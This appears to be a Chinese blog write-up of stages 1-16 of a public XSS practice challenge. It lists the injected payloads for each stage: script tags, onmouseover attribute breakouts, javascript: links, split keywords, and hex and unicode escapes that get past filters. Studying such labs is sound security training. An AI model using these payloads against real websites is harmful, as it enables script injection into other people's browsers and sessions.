XSS challenges 1-16 - 代码天地

XSS challenges 1-16

其他 2020-05-23 23:08:14 阅读次数: 0

看了一遍视频后自己再试一试，挠头

https://xss-quiz.int21h.jp/

Stage #1

输入1111

显示

查看代码

扫描二维码关注公众号，回复： 11254924 查看本文章

直接输入

<script>alert(document.domain);</script>

Stage #2

输入1111

查看代码，如图

尝试闭合标签

1111 "><script>alert(document.domain)</script>

成功，并且代码显示为

Stage #3

输入1111

代码显示为

尝试

"><script>alert(document.domain);</script>

显示

考虑在Japan后进行闭合，打开Burpsuite，进行如图修改

p1=1111&p2=Japan >"<script>alert(document.domain)</script>

成功

Stage #4

输入1111

能发现有个hidden，抓包后能看到

则尝试在hackme后面添加”><script>alert(document.domain)</script>

成功

Stage #5

输入1111

查看代码

maxlength只有15，如果输入

"><script>alert(document.domain)</script>不够长

如图

则修改maxlength

再次输入"><script>alert(document.domain)</script>

成功

Stage #6

输入1111，查看代码

尝试闭合，输入"><script>alert(document.domain)</script>

"、<、>都被转换

尝试" onmouseover="alert(document.domain)

成功，代码显示为

Stage #7

输入1111，查看代码

尝试"><script>alert(document.domain)</script>

显示

尝试" onmouseover="alert(document.domain)

显示

观察代码，好像多了两个双引号，尝试onmouseover=alert(document.domain)

显示

挠头，再试试"onmouseover=alert(document.domain)

挠头

看看hint

Hint: nearly the same... but a bit more tricky.再看看代码

试试" onmouseover=alert(document.domain)

行了

Stage #8

输入1111，查看代码

和页面显示的

尝试javascript:alert(document.domain)

点击产生的url

成功

Stage #9

输入1111

眼熟，嗯

先试试"><script>alert(document.domain)</script>

果然不行，再试试"onmouseover=alert(document.domain)，还是不行

再试试">,还是被变成了字符串的形式

再看看hint

Hint: UTF-7 XSS，挠头

跳过

在console里输入

进入下一关

Stage #10

先输入1111，看代码

好像比较正常，试试

"><script>alert(document.domain)</script>

我的domain呢？？

试试双写

"><script>alert(document.domdomainain)</script>

ok了

Stage #11

输入1111

哟

比较正常，试试"><script>alert(document.domain)</script>

被转换了

再试试"onmouseover=alert(document.domain)

onmouseover被过滤了

再试试"><a href="javascript:alert(documment.domain)">xss</a>

挠头，被转换了

试试
将JavaScript分开

"><a href="javascr
ipt:alert(document.domain);">xss<a>

点击xss

成功

Stage #12

输入1111，查看代码

挺正常的，试试"><script>alert(document.domain)</script>

>,<都被消去了，看看hint试试将<,>转换成16进制

"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e

挠头，试试

"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

挠头，百度启动，要在IE浏览器中用``,

跳过

Stage #13

好像这个的操作别的浏览器不支持了，只有IE支持

跳过

Stage #14

挠头，跳过

Stage #15

输入1111，看代码

挠头，挺正常，试试"><script>alert(document.domain)</script>

挠头，试试转换<,>

"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e

再试试"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

ok

Stage #16

直接unicode转换

"\\u003e\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

ok

猜你喜欢

转载自www.cnblogs.com/coxq/p/12944936.html

XSS challenges 1-16

XSS Challenges

XSS Challenges(1-12关)

XSS Challenges/刷题/Stage #1

XSS-Lab（XSS注入笔记1-16）

XSS练习平台【XSS Challenges】

XSS Challenges过关答案

Challenges-XSS

xss challenges writeup(下)

XSS Challenges 记录与反思

XSS学习笔记：XSS Challenges 1-19通关全详解

XSS Challenges部分题目总结

XSS Challenges/刷题/Stage #5

XSS Challenges/刷题/Stage #4

XSS Challenges/刷题/Stage #3

XSS Challenges/刷题/Stage #2

XSS Challenges/刷题/Stage #7

XSS Challenges/刷题/Stage #6

XSS Challenges xss-quiz.int21h.jp

【论文阅读#1】Edge Computing: Vision and Challenges

Python 1-16 bytes

XSS (1)

XSS 1

XSS之xss-labs-level16

XSS之旅（1-13，16）

Bugku CTF Web(1-16) writeup

VRTK_案例解析1-16

the c language练习 1-16

SQLi-LABS Page-1(Basic Challenges)

sqli-libs笔记Page-1(Basic Challenges)

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

周排行

Python环境安装与基础语法（1）——计算机基础知识

IMU预积分

ADAS中的LDW、FCW、BSD、LCA、ACC、AEB、APA、DMS代表的含义

B站笔试两道题

skyeye arm 硬件虚拟机环境的搭建

Web前端静态页面示例

数组-合并排序数组 II-简单

springcloud之版本问题启动报错

面向对象-------------匿名对象(六)

输入URL到页面呈现中间发生了什么？

每日归档

更多

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)